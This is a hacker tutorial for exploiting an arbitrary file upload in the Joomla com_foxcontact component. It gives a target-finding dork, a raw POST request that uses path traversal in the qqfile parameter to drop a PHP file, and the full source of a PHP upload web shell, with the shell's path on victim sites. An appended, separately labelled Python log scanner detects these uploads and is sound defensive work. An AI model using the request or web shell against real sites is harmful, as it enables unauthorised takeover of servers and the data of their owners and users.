Manual Exploit com_foxcontact shell upload
We will use any header injection tool
I will use Burp Suite
dork inurl:com_foxcontact
-HTTP Header Example-
POST http://127.0.0.1/components/com_foxcontact/lib/file-uploader.php?cid=490&mid=0&qqfile=/../../up.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
X-File-Name: shell.php
Content-Type: image/jpeg
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
<?php cmd or file upload ?>
############################
Shell path:
www.site.com/components/com_foxcontact/filename.php
###########################
my script upload
<?php
echo "<center>";
$files = @$_FILES["files"];
if ($files["name"] != '') {
$fullpath = $_REQUEST["path"] . $files["name"];
if (move_uploaded_file($files['tmp_name'], $fullpath)) {
echo "<h1><a href='$fullpath'>upload successful ^__^</a></h1>";
}
}echo '
<img src="http://www.sqorebda3.com/vb/Photo/new_1422333365_894.gif"> <br><br><br><br>
<html><head><title>file upload by sohaip-hackerDZ</title></head><body>
<style type="text/css">
body{
background-color: #000000;
font: bold;
font-size: 20px;
}
b{
color:#FF0000;
font-size: 20px;
}
</style>
<b>file upload by sohaip-hackerDZ<b><br><br>
<form method=POST enctype="multipart/form-data" action=""><input type="file" name="files"><input type=submit value="Upl0Ad"></form></body></html>';
echo "<center/>";
?>
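Added example, not part of the original post: a log check for the request shown above, which flags POSTs to file-uploader.php whose qqfile value contains path traversal or a server-executable extension, and then any later request for that file name under the component directory. It assumes Combined Log Format access logs; the sample lines, IP addresses and the names scan, SAMPLE and EXEC_EXT are constructed for illustration. The X-File-Name header is not recorded by default access logs, so the check works on the query string.

```python
import re
from posixpath import basename
from urllib.parse import parse_qs, unquote, urlsplit

UPLOADER = "/components/com_foxcontact/lib/file-uploader.php"
COMPONENT_DIR = "/components/com_foxcontact/"
EXEC_EXT = re.compile(r"\.(php\d?|phtml|phar|pht)(\.|$)", re.I)
# Combined Log Format: ip - - [ts] "METHOD target PROTO" status size ...
LINE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')

# Constructed sample log lines (not taken from a real server).
SAMPLE = [
    '203.0.113.7 - - [10/Feb/2015:10:00:01 +0000] "POST /components/com_foxcontact/lib/file-uploader.php?cid=490&mid=0&qqfile=photo.jpg HTTP/1.1" 200 31',
    '203.0.113.9 - - [10/Feb/2015:10:02:11 +0000] "POST /components/com_foxcontact/lib/file-uploader.php?cid=490&mid=0&qqfile=/../../up.php HTTP/1.1" 200 31',
    '203.0.113.9 - - [10/Feb/2015:10:02:30 +0000] "GET /components/com_foxcontact/up.php HTTP/1.1" 200 512',
    '198.51.100.4 - - [10/Feb/2015:10:03:00 +0000] "GET /index.php?option=com_foxcontact HTTP/1.1" 200 9000',
]

def scan(lines):
    """Return (line_no, ip, reason) for suspicious uploads and follow-up hits."""
    findings, dropped = [], set()
    for no, line in enumerate(lines, 1):
        m = LINE.match(line)
        if not m:
            continue
        ip, _ts, method, target, status = m.groups()
        url = urlsplit(target)  # also handles absolute-form request targets
        path = unquote(url.path)
        if method == "POST" and path.lower() == UPLOADER:
            for name in parse_qs(url.query).get("qqfile", []):
                name = unquote(name)  # second decode catches double encoding
                parts = name.replace("\\", "/").split("/")
                reasons = []
                if ".." in parts:
                    reasons.append("path traversal")
                if EXEC_EXT.search(name):
                    reasons.append("executable extension")
                if reasons:
                    dropped.add(parts[-1].lower())  # remember the file name
                    findings.append((no, ip, "upload: " + ", ".join(reasons)))
        elif path.lower().startswith(COMPONENT_DIR) and basename(path).lower() in dropped:
            findings.append((no, ip, f"follow-up: {method} {path} -> {status}"))
    return findings
```

A follow-up finding with status 200 means the uploaded file was reachable and the host should be treated as compromised; a 404 suggests the write or the traversal failed.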